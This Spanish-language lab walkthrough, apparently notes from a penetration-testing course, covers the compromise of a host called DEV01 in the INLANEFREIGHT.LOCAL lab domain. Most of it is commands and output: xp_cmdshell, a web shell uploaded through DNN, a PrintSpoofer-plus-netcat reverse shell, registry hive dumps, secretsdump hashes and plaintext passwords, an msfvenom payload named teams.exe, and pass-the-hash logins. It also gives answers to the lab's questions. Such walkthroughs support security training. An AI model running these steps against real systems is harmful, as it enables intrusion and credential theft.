Explotación y escalada de privilegios

AnteriorRecopilación de información interna SiguienteMovimiento lateral y escalada de privilegios

Última actualización hace 4 días

¿Te fue útil?

Explotación y escalada de privilegios

En este punto, hemos pasado de las etapas Information Gathering y Vulnerability Assessment a la etapa Exploitation del proceso de pruebas de penetración. Tras establecernos, enumeramos los hosts disponibles, buscamos puertos abiertos y sondeamos los servicios accesibles.

Atacando DNN

Vayamos a DNN y probemos con el par de credenciales Administrator:D0tn31Nuk3R0ck$$@123. Esto es un éxito; hemos iniciado sesión como administrador superusuario. Aquí queremos registrar otros dos hallazgos de alto riesgo: Insecure File Shares y Sensitive Data on File Shares. Podríamos combinarlos en uno, pero conviene destacarlos como problemas separados, ya que si el cliente restringe el acceso anónimo, pero todos los usuarios del dominio pueden acceder al recurso compartido y ver datos innecesarios para su trabajo diario, sigue existiendo un riesgo.

Enumerando el objetivo se puede acceder a una consola SQL en la página Settings donde podemos habilitar xp_cmdshell y ejecutar comandos del sistema operativo. Para habilitarla, primero debemos pegar estas líneas en la consola una por una y hacer clic en Run Script. No obtendremos ningún resultado de cada comando, pero si no hay errores, normalmente significa que funciona.

EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE

Si esto funciona, podemos ejecutar comandos del sistema operativo en formato xp_cmdshell '<command here>'. Podríamos usarlo para obtener un shell inverso o trabajar en la escalada de privilegios.

Una vez cargado, podemos hacer clic derecho en el archivo subido y seleccionar Get URL. La URL resultante nos permitirá ejecutar comandos a través del shell web, donde podremos trabajar para obtener un reverse shell o realizar pasos de escalada de privilegios, como veremos a continuación.

Escalada de privilegios

Intentaremos escalar privilegios con la herramienta PrintSpoofer y luego veremos si podemos extraer credenciales útiles de la memoria o el registro del host. Necesitaremos nc.exe en el host DEV01 para enviarnos un shell y el binario PrintSpoofer64.exe para aprovechar los privilegios SeImpersonate. Hay varias maneras de transferirlos. Podríamos usar el host dmz01 como "host de salto" y transferir nuestras herramientas a través de él mediante SCP, y luego iniciar un servidor web Python3 y descargarlas en el host DEV01 usando certutil.

Una forma más sencilla sería modificar el DNN Allowable File Extensions de nuevo para permitir el formato de archivo .exe. Luego, podemos cargar ambos archivos y confirmar mediante nuestro shell que se encuentran en formato c:\DotNetNuke\Portals\0.

Una vez cargado, podemos iniciar un listener Netcat en el host dmz01 y ejecutar el siguiente comando para obtener un reverse shell como NT AUTHORITY\SYSTEM:

c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"

Ejecutamos el comando y obtenemos un reverse shell casi instantáneamente.

root@dmz01:/tmp# nc -lnvp 443

Listening on 0.0.0.0 443
Connection received on 172.16.8.20 58480
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>hostname
hostname
ACADEMY-AEN-DEV01

Desde aquí, podemos realizar una post-explotación y recuperar manualmente el contenido de la base de datos SAM y con él, el hash de la contraseña del administrador local.

c:\DotNetNuke\Portals\0> reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SYSTEM SYSTEM.SAVE

The operation completed successfully.

c:\DotNetNuke\Portals\0> reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SECURITY SECURITY.SAVE

The operation completed successfully.

c:\DotNetNuke\Portals\0> reg save HKLM\SAM SAM.SAVE
reg save HKLM\SAM SAM.SAVE

The operation completed successfully.

Ahora podemos modificar de nuevo las extensiones de archivo permitidas para poder descargar los archivos .SAVE. A continuación, podemos volver a la página File Management y descargar cada uno de los tres archivos a nuestro host de ataque.

Finalmente, podemos usar secretsdump para volcar la base de datos SAM y recuperar un conjunto de credenciales de los secretos de LSA.

afsh4ck@kali$ impacket-secretsdump LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE

Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0xb3a720652a6fca7e31c1659e3d619944
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<redacted>:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:3bb874a52ce7b0d64ee2a82bbf3fe1cc:::
[*] Dumping cached domain logon information (domain/username:hash)
INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#f7d7bba128ca183106b8a3b3de5924bc
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:3e002600200046005a003000460021004b00460071002e002b004d0042005000480045002e006c00280078007900580044003b0050006100790033006e002a0047004100590020006e002d00390059003b0035003e0077005d005f004b004900400051004e0062005700440074006b005e0075004000490061005d006000610063002400660033003c0061002b0060003900330060006a00620056006e003e00210076004a002100340049003b00210024005d004d006700210051004b002e004f007200290027004c00720030005600760027004f0055003b005500640061004a006900750032006800540033006c00
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:cb8a6327fc3dad4ea7c84b88c7542e7c
[*] DefaultPassword 
(Unknown User):Gr8hambino!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6968d50f5ec2bc41bc207a35f0392b72bb083c22
dpapi_userkey:0xe1e7a8bc8273395552ae8e23529ad8740d82ea92
[*] NL$KM 
 0000   21 0C E6 AC 8B 08 9B 39  97 EA D9 C6 77 DB 10 E6   !......9....w...
 0010   2E B2 53 43 7E B8 06 64  B3 EB 89 B1 DA D1 22 C7   ..SC~..d......".
 0020   11 83 FA 35 DB 57 3E B0  9D 84 59 41 90 18 7A 8D   ...5.W>...YA..z.
 0030   ED C9 1C 26 FF B7 DA 6F  02 C9 2E 18 9D CA 08 2D   ...&...o.......-
NL$KM:210ce6ac8b089b3997ead9c677db10e62eb253437eb80664b3eb89b1dad122c71183fa35db573eb09d84594190187a8dedc91c26ffb7da6f02c92e189dca082d
[*] Cleaning up...

Confirmamos que estas credenciales funcionan con CrackMapExec y que ahora tenemos una forma de regresar a este sistema en caso de que perdamos nuestro reverse shell.

afsh4ck@kali$ proxychains crackmapexec smb 172.16.8.20 --local-auth -u administrator -H <redacted>

ProxyChains-3.1 (http://proxychains.sf.net)
[*] Initializing LDAP protocol database
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:445-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:445-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:135-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:445-<><>-OK
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:445-<><>-OK
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-AEN-DEV) (domain:ACADEMY-AEN-DEV) (signing:False) (SMBv1:False)
|S-chain|-<>-127.0.0.1:8081-<><>-172.16.8.20:445-<><>-OK
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  [+] ACADEMY-AEN-DEV\administrator <redacted> (Pwn3d!)

En el resultado anterior, observamos una contraseña en texto plano, pero no se ve inmediatamente para qué usuario es. Podríamos volver a volcar LSA usando CrackMapExec y confirmar que la contraseña corresponde al usuario hporter.

Ya tenemos nuestro primer conjunto de credenciales de dominio para el dominio INLANEFREIGHT.LOCAL. hporter:Gr8hambino!Podemos confirmarlo desde nuestro shell inverso en dmz01.

c:\DotNetNuke\Portals\0> net user hporter /dom
net user hporter /dom

The request will be processed at a domain controller for domain INLANEFREIGHT.LOCAL.

User name                    hporter
Full Name                    
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/1/2022 11:32:05 AM
Password expires             Never
Password changeable          6/1/2022 11:32:05 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/21/2022 7:03:10 AM

Logon hours allowed          All

Local Group Memberships      
Global Group memberships     *Domain Users         
The command completed successfully.

También podríamos escalar privilegios en el host DEV01 aprovechando la vulnerabilidad PrintNightmare. Existen otras maneras de recuperar las credenciales, como usar Mimikatz. Experimente con esta máquina y aplique las diversas habilidades aprendidas para Penetration Tester Pathrealizar estos pasos de todas las maneras posibles y encontrar la que mejor se adapte a sus necesidades.

En este momento, no tenemos hallazgos adicionales que anotar, ya que solo abusamos de la funcionalidad integrada, lo cual no pudimos hacer debido a los problemas de intercambio de archivos mencionados anteriormente. Podríamos registrarlo PrintNightmarecomo un hallazgo de alto riesgo si logramos explotarlo.

Método alternativo: Reverse Port Forwarding

Es posible que queramos obtener un shell de Meterpreter en el objetivo o un shell inverso directamente por varias razones. También podríamos haber realizado todas estas acciones sin obtener un shell, ya que podríamos haber usado PrintSpoofer para agregar un administrador local o volcar credenciales desde DEV01 y luego conectarnos al host de cualquier número de maneras desde nuestro host de ataque usando Proxychains (pass-the-hash, RDP, WinRM, etc.). Vea cuántas maneras puede lograr la misma tarea de interactuar con el host DEV01 directamente desde su host de ataque. Es esencial ser versátil, y esta red de laboratorio es un gran lugar para practicar tantas técnicas como sea posible y perfeccionar nuestras habilidades.

Analicemos rápidamente el método de reenvío de puertos inverso. Primero, necesitamos generar una carga útil usando msfvenom. Tenga en cuenta que aquí especificaremos la dirección IP del host dmz01 pivote en el campo lhost y NO la IP de nuestro host de ataque, ya que el objetivo no podría conectarse directamente con nosotros.

afsh4ck@kali$ msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.8.120 -f exe -o teams.exe LPORT=443

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 787 bytes
Final size of exe file: 7168 bytes
Saved as: teams.exe

A continuación, debemos configurar un listener multi/handler e iniciarlo en un puerto diferente al que utilizará la carga útil que generamos:

[msf](Jobs:0 Agents:0) exploit(windows/smb/smb_delivery) >> use multi/handler
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/x64/meterpreter/reverse_https
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lhost 0.0.0.0
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lport 7000
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> run

[*] Started HTTPS reverse handler on https://0.0.0.0:7000

A continuación, necesitamos subir el peyload de reverse shell teams.exe al host de destino DEV01. Podemos usar SCP hasta dmz01, iniciar un servidor web Python en ese host y descargar el archivo. Como alternativa, podemos usar el administrador de archivos DNN para subir el archivo como hicimos anteriormente.

Con el payload en el destino, debemos configurar SSH remote port forwardingel reenvío del puerto del cuadro pivote dmz01 443al puerto del receptor de Metasploit [nombre del host] 7000. El Rindicador indica al host pivote que escuche en el puerto 443y reenvíe todo el tráfico entrante a este puerto a nuestro receptor de Metasploit [nombre del host] 0.0.0.0:7000configurado en nuestro host de ataque.

afsh4ck@kali$ ssh -i dmz01_key -R 172.16.8.120:443:0.0.0.0:7000 root@10.129.203.111 -vN

OpenSSH_8.4p1 Debian-5, OpenSSL 1.1.1n  15 Mar 2022
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug1: Connecting to 10.129.203.111 [10.129.203.111] port 22.

<SNIP>

debug1: Authentication succeeded (publickey).
Authenticated to 10.129.203.111 ([10.129.203.111]:22).
debug1: Remote connections from 172.16.8.120:443 forwarded to local address 0.0.0.0:7000
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Remote: /root/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug1: Remote: /root/.ssh/authorized_keys:1: key options: agent-forwarding port-forwarding pty user-rc x11-forwarding
debug1: Remote: Forwarding listen address "172.16.8.120" overridden by server GatewayPorts
debug1: remote forward success for: listen 172.16.8.120:443, connect 0.0.0.0:7000

A continuación, ejecute la carga útil teams.exe desde el host DEV01 y, si todo va según lo planeado, recuperaremos la conexión.

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> exploit

[*] Started reverse TCP handler on 0.0.0.0:7000 
[*] Sending stage (175174 bytes) to 127.0.0.1
[*] Meterpreter session 2 opened (127.0.0.1:7000 -> 127.0.0.1:51146 ) at 2022-06-22 12:21:25 -0400

(Meterpreter 2)(c:\windows\system32\inetsrv) > getuid
Server username: IIS APPPOOL\DotNetNukeAppPool

Una advertencia sobre el método anterior es que, por defecto, OpenSSH solo permite la conexión a puertos remotos reenviados desde el propio servidor (localhost). Para ello, debemos editar el archivo /etc/ssh/sshd_config en sistemas Ubuntu y cambiar la línea GatewayPorts no a GatewayPorts yes; de lo contrario, no podremos obtener una respuesta en el puerto que reenviamos en el comando SSH (el puerto 443 en nuestro caso).

Un buen comienzo

Ahora que hemos enumerado la red interna atacada en nuestro primer host, escalado privilegios, realizado la postexplotación y configurado nuestros pivotes/múltiples métodos para evaluar la red interna, centrémonos en el entorno de AD. Dado que contamos con un conjunto de credenciales, podemos realizar diversas enumeraciones para comprender mejor el entorno y buscar vías para acceder a la administración del dominio.

Caso práctico

Objetivo: 10.129.2.103

Pregunta 1

Recupere el contenido de la base de datos SAM en el host DEV01. Envíe el hash NT del usuario administrador como respuesta.

Configurar proxy en el navegador

Necesitamos configurar el proxy para navegar a sitios de la red interna:

Al navegar a la siguiente dirección llegamos al panel de login de admin de DNN:

http://172.16.8.20/Login?returnurl=%2fadmin

Introducimos las credenciales que encontramos al montar NFS:

Administrator:D0tn31Nuk3R0ck$$@123

Al acceder nos encontramos un directorio File Management y dentro la siguiente estructura de archivos:

Root/
├── Images/
├── Templates/
└── Users/

En Users hay un directorio 002, que al pulsarlo nos muestra un panel de configuración:

http://172.16.8.20/Admin/File-Management?folderId=40&view=gridview&pageSize=10

Modificar extensiones permitidas

La lista de extensiones de archivo permitidas se puede modificar para incluir .asp , .exe y .aspx; para ello, basta con buscar Settings -> Security -> More -> More Security Settings y añadirlas en Allowable File Extensions, y hacer clic en el botón Save.

Una vez cargado, hacemos clic derecho en el archivo subido y seleccionamos Get URL. La URL que nos genera nos permitirá ejecutar comandos a través del webshell, donde podremos trabajar para obtener un reverse shell.

http://172.16.8.20/Portals/0/newaspcmd.asp?ver=ySZkWYIErgUYNRny59Jklw%3d%3d

Escalada de privilegios

Vamos a escalar privilegios con la herramienta PrintSpoofer y luego veremos si podemos extraer credenciales útiles de la memoria o el registro del host. Necesitaremos nc.exe en el host DEV01 para enviarnos un shell y el binario PrintSpoofer64.exe para aprovechar los privilegios SeImpersonate. Hay varias maneras de transferirlos.

La forma más sencilla sería modificar el DNN Allowable File Extensions de nuevo para permitir el formato de archivo .exe. Luego, podemos cargar ambos archivos en http://172.16.8.20/admin/file-management y confirmar mediante nuestro shell que se encuentran en formato c:\DotNetNuke\Portals\0.

Una vez cargado, podemos iniciar un listener Netcat en el host dmz01 y ejecutar el siguiente comando para obtener un reverse shell como NT AUTHORITY\SYSTEM:

c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 172.16.8.120 443 -e cmd"

En DMZ01 abrimos un listener de Netcat por el puerto 443:

root@dmz01:/tmp# nc -lnvp 443

Listening on 0.0.0.0 443

Ejecutamos el comando y obtenemos un reverse shell casi instantáneamente.

Desde aquí, podemos realizar una post-explotación y recuperar manualmente el contenido de la base de datos SAM y con él, el hash de la contraseña del administrador local.

c:\DotNetNuke\Portals\0> reg save HKLM\SYSTEM SYSTEM.SAVE
reg save HKLM\SYSTEM SYSTEM.SAVE

The operation completed successfully.

c:\DotNetNuke\Portals\0> reg save HKLM\SECURITY SECURITY.SAVE
reg save HKLM\SECURITY SECURITY.SAVE

The operation completed successfully.

c:\DotNetNuke\Portals\0> reg save HKLM\SAM SAM.SAVE
reg save HKLM\SAM SAM.SAVE

The operation completed successfully.

Extracción de los hashes

Al extraer los hashes obtenemos una contraseña en plano Gr8hambino!, pero que no corresponde a ningún usuario, llamándonos mucho la atención:

afsh4ck@kali$ impacket-secretsdump LOCAL -system SYSTEM.SAVE -sam SAM.SAVE -security SECURITY.SAVE
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0xb3a720652a6fca7e31c1659e3d619944
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e20798f695ab0d04bc138b22344cea8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
mpalledorous:1001:aad3b435b51404eeaad3b435b51404ee:3bb874a52ce7b0d64ee2a82bbf3fe1cc:::
[*] Dumping cached domain logon information (domain/username:hash)
INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#f7d7bba128ca183106b8a3b3de5924bc: (2022-06-23 04:59:45)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:83149b892315469ded73f92168ce5d60383d1f7ddf831deb8402025d9183673572fb55dcf6f827eb62046f08b1fb37fbd9048b9afe76457d1054982cfab0fd4a1882d73ac774b2e7abb0a41fa9576ed3b7396eb18c7d4a3afe6fb0abf6852b8f54d2b0fee8ac70c5181a435fe7df2cc534f54255ad0c6b58604ca8409bc0a88c7755d484c7a5b712837374878987954a640c0a27f45f786aaeabf83a7924cf3b5d533de4b4142efaff77d86cb88f3adfb8d37f11cdaf57a866addcd91915c4e2158da73dc75df3ecf008db44e2a3838c659f3bd555165adb96d25a4b5c12625afe64eb9f3fd8ff643d2d073e90c95845
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:18c7b736e82f3c505262f838dd7c4326
[*] DefaultPassword 
(Unknown User):Gr8hambino!
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6968d50f5ec2bc41bc207a35f0392b72bb083c22
dpapi_userkey:0xe1e7a8bc8273395552ae8e23529ad8740d82ea92
[*] NL$KM 
 0000   21 0C E6 AC 8B 08 9B 39  97 EA D9 C6 77 DB 10 E6   !......9....w...
 0010   2E B2 53 43 7E B8 06 64  B3 EB 89 B1 DA D1 22 C7   ..SC~..d......".
 0020   11 83 FA 35 DB 57 3E B0  9D 84 59 41 90 18 7A 8D   ...5.W>...YA..z.
 0030   ED C9 1C 26 FF B7 DA 6F  02 C9 2E 18 9D CA 08 2D   ...&...o.......-
NL$KM:210ce6ac8b089b3997ead9c677db10e62eb253437eb80664b3eb89b1dad122c71183fa35db573eb09d84594190187a8dedc91c26ffb7da6f02c92e189dca082d
[*] Cleaning up...

Confirmación de acceso

Observamos que tenemos acceso con el hash del administrador:

afsh4ck@kali$ proxychains crackmapexec smb 172.16.8.20 --local-auth -u administrator -H 0e20798f695ab0d04bc138b22344cea8

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:135  ...  OK
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-AEN-DEV) (domain:ACADEMY-AEN-DEV) (signing:False) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  [+] ACADEMY-AEN-DEV\administrator:0e20798f695ab0d04bc138b22344cea8 (Pwn3d!)

Volcado de LSASS como Administrador (opcional)

Al volcar lsass como administrador observamos que la contraseña Gr8hambino! que encontramos pertenece al usuario hporter:

afsh4ck@kali$  proxychains crackmapexec smb 172.16.8.20 --local-auth -u administrator -H 0e20798f695ab0d04bc138b22344cea8 --lsa

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:135  ...  OK
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  [*] Windows 10 / Server 2019 Build 17763 x64 (name:ACADEMY-AEN-DEV) (domain:ACADEMY-AEN-DEV) (signing:False) (SMBv1:False)
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:445  ...  OK
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  [+] ACADEMY-AEN-DEV\administrator:0e20798f695ab0d04bc138b22344cea8 (Pwn3d!)
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  [+] Dumping LSA secrets
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  INLANEFREIGHT.LOCAL/hporter:$DCC2$10240#hporter#f7d7bba128ca183106b8a3b3de5924bc: (2022-06-23 04:59:45)
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  INLANEFREIGHT\ACADEMY-AEN-DEV$:aes256-cts-hmac-sha1-96:d87e1fca921f09244695b9914b251176c90fad31b8dbb0ff24cd95e9beba3ae1
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  INLANEFREIGHT\ACADEMY-AEN-DEV$:aes128-cts-hmac-sha1-96:fce106bc65486d37dd4fe111f7a160cd
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  INLANEFREIGHT\ACADEMY-AEN-DEV$:des-cbc-md5:8664ef64c2ea2ae5
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  INLANEFREIGHT\ACADEMY-AEN-DEV$:plain_password_hex:83149b892315469ded73f92168ce5d60383d1f7ddf831deb8402025d9183673572fb55dcf6f827eb62046f08b1fb37fbd9048b9afe76457d1054982cfab0fd4a1882d73ac774b2e7abb0a41fa9576ed3b7396eb18c7d4a3afe6fb0abf6852b8f54d2b0fee8ac70c5181a435fe7df2cc534f54255ad0c6b58604ca8409bc0a88c7755d484c7a5b712837374878987954a640c0a27f45f786aaeabf83a7924cf3b5d533de4b4142efaff77d86cb88f3adfb8d37f11cdaf57a866addcd91915c4e2158da73dc75df3ecf008db44e2a3838c659f3bd555165adb96d25a4b5c12625afe64eb9f3fd8ff643d2d073e90c95845
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  INLANEFREIGHT\ACADEMY-AEN-DEV$:aad3b435b51404eeaad3b435b51404ee:18c7b736e82f3c505262f838dd7c4326:::
SMB         172.16.8.20     445    ACADEMY-AEN-DEV  INLANEFREIGHT\hporter:Gr8hambino!

Pregunta 2

Escale privilegios en el host DEV01. Envíe el contenido del archivo flag.txt al Escritorio del Administrador.

Pass the Hash con Evil WinRM

afsh4ck@kali$ proxychains evil-winrm -i 172.16.8.20 -u Administrator -H 0e20798f695ab0d04bc138b22344cea8

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Strict chain  ...  127.0.0.1:8081  ...  172.16.8.20:5985  ...  OK
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
academy-aen-dev\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/22/2022   9:05 PM             17 flag.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat flag.txt
K33p_0n_sp**********!